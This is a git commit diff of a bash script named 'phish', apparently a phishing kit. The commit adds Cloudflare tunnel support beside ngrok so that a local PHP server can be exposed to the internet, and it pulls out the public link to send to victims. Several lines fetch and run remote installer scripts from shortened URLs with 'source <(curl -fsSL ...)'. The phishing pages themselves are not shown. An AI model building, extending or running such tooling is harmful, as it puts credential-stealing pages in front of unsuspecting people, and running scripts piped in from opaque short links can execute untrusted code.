cloudflared added and all other bugs fixed

diff --git a/phish b/phish
--- a/phish
+++ b/phish
@@ -1,4 +1,6 @@
 #!/bin/bash
+CWD=$(pwd)
+#set -x
 #<<<----------DISTRO VERIFICATION---------->>>
 distro=$(uname -o)
 case ${distro} in
@@ -43,43 +45,50 @@ GNU/Linux)
 ;;
 esac
 #<<<----------NGROK---------->>>
-if [[ ${distro^^} == *'ANDROID'* ]]; then
-  appl=$(pwd)
-  if [[ ${appl} == *'com.termux'* ]]; then
-     ngk=$(cd /data/data/com.termux/files/usr/bin; find ngrok)
-     if [[ $ngk == ngrok ]]; then
-       :
-     else
-       echo
-       printf "\e[1;32m[\e[1;31m!\e[1;32m]\e[1;31mNGROK not found!!\e[0m\n"
-       echo
-       source <(curl -fsSL "https://bit.ly/3repcoL")
-       echo
-     fi
-   elif [[ ${appl} == *'hilled.pwnterm'* ]]; then
-     ngk=$(cd /data/data/hilled.pwnterm/files/usr/bin; find ngrok)
-     if [[ $ngk == ngrok  ]]; then
-       :
-     else
-       echo
-       printf "\e[1;32m[\e[1;31m!\e[1;32m]\e[1;31mNGROK not found!!\e[0m\n"
-       echo
-       source <(curl -fsSL "https://bit.ly/3repcoL")
-     fi
-   else
-     printf "\e[1;31m Your system is not eleigble to run this tool!!\e[0m\n"
-     exit 1
-  fi
-else
-  ngk=$(find /usr/bin/ngrok)
-  if [[ ${ngk} == *'/usr/bin/ngrok'* ]]; then
-    :
-  else
-    echo
-    printf "\e[1;32m[\e[1;31m!\e[1;32m]\e[1;31mNGROK not found!!\e[0m\n"
-    echo
-    source <(curl -fsSL "https://bit.ly/3repcoL")
-  fi
+#if [[ ${distro^^} == *'ANDROID'* ]]; then
+#  appl=$(pwd)
+#  if [[ ${appl} == *'com.termux'* ]]; then
+#     ngk=$(cd /data/data/com.termux/files/usr/bin; find ngrok)
+#     if [[ $ngk == ngrok ]]; then
+#       :
+#     else
+#       echo
+#       printf "\e[1;32m[\e[1;31m!\e[1;32m]\e[1;31mNGROK not found!!\e[0m\n"
+#       echo
+#       source <(curl -fsSL "https://bit.ly/3repcoL")
+#       echo
+#     fi
+#   elif [[ ${appl} == *'hilled.pwnterm'* ]]; then
+#     ngk=$(cd /data/data/hilled.pwnterm/files/usr/bin; find ngrok)
+#     if [[ $ngk == ngrok  ]]; then
+#       :
+#     else
+#       echo
+#       printf "\e[1;32m[\e[1;31m!\e[1;32m]\e[1;31mNGROK not found!!\e[0m\n"
+#       echo
+#       source <(curl -fsSL "https://bit.ly/3repcoL")
+#     fi
+#   else
+#     printf "\e[1;31m Your system is not eleigble to run this tool!!\e[0m\n"
+#     exit 1
+#  fi
+#else
+#  ngk=$(find /usr/bin/ngrok)
+#  if [[ ${ngk} == *'/usr/bin/ngrok'* ]]; then
+#    :
+#  else
+#    echo
+#    printf "\e[1;32m[\e[1;31m!\e[1;32m]\e[1;31mNGROK not found!!\e[0m\n"
+#    echo
+#    source <(curl -fsSL "https://bit.ly/3repcoL")
+#  fi
+#fi
+if ! hash ngrok > /dev/null 2>&1; then
+  source <(curl -fsSL "https://bit.ly/3repcoL")
+fi
+#<<<----cloudflare setup---->>>
+if ! hash cloudflared > /dev/null 2>&1; then
+  source <(curl -fsSL "https://git.io/JinSa")
 fi
 #<<<---------banner---------->>>
 __banner__() {
@@ -292,7 +301,28 @@ printf "${C7}[${C1}!${C7}]${C1} Please enter a valid option!!${R0}\n"
 echo
 fi
 done
+echo
+killall php > /dev/null 2>&1
+killall cloudflared > /dev/null 2>&1
+killall ngrok > /dev/null 2>&1
+echo -e "
+${C2}=========================${R0}
+     ${B1}Server options:-${R1}
+${C3}-------------------------${R0}
 
+${C2}(${C6}01${C2})${C4}Ngrok${R0}
+${C2}(${C6}02${C2})${C4}cloudflare ${C6}(recommended)${R0}
+" | pv -qL 1000
+echo
+while true; do
+        printf "\033[3;4;37mTSc\033[0;0;00m ${C7}Enter(${C1}server${C7})> ${R0}"
+        read serve
+        if [[ $serve == '1' || $serve == '01' || $serve == '2' || $serve == '02' ]]; then
+                break
+        else
+                printf "${C7}[${C1}!${C7}]${C1} Please enter a valid 66option!!${R0}\n"
+        fi
+done
 echo
 processbar
 echo
@@ -305,18 +335,36 @@ php -S 127.0.0.1:4444 > /dev/null 2>&1 &
 sleep 3
 echo
 if [[ $distro == *'Android'* ]]; then
+if [[ $serve == '1' ]]; then
 termux-chroot ngrok http 4444 > /dev/null 2>&1 &
 else
-sudo ngrok http 4444 > /dev/null 2>&1 &
+termux-chroot cloudflared tunnel -url 127.0.0.1:4444 --logfile ${CWD}/.cloudflare-log > /dev/null 2>&1 &
 fi
+else
+if [[ $serve == '1' ]]; then
+sudo ngrok http 4444 > /dev/null 2>&1 &
+else
+cloudflared tunnel -url 127.0.0.1:4444 --logfile ${CWD}/.cloudflare-log > /dev/null 2>&1 &
+fi
+fi
+
 sleep 7
 echo
+#sab khush raho hr tarah se link filter kr diya !! XD:->
+#link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | jq -r .tunnels[0].public_url | grep -Eo [-a0-z9]+.ngrok.io)
+if [[ $serve == '1' ]]; then
+link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -Eo [-a0-z9]+.ngrok.io)
+else
+link=$(grep -o '[-a0-z9]*\.trycloudflare.com' "${CWD}/.cloudflare-log")
+hoster=""
+rm -rf ${CWD}/.cloudflare-log > /dev/null 2>&1
+fi
 #link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "[0-9a-z]*\.ngrok.io")
-r1=$(curl -s -N http://127.0.0.1:4040/api/tunnels | jq | grep public_url | awk '{print $2}')
-r2=$(printf "${r1/\"http:\/\//}")
-r3=$(printf "${r2/\"https:\/\//}")
-r4=$(printf "${r3/\",/}")
-link=$(printf "${r4/%\",/}")
+#r1=$(curl -s -N http://127.0.0.1:4040/api/tunnels | jq | grep public_url | awk '{print $2}')
+#r2=$(printf "${r1/\"http:\/\//}")
+#r3=$(printf "${r2/\"https:\/\//}")
+#r4=$(printf "${r3/\",/}")
+#link=$(printf "${r4/%\",/}")
 #we can also do
 ###############################################################################################
 #link=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -Eo '(https)://[^/"]+(.ngrok.io)')#
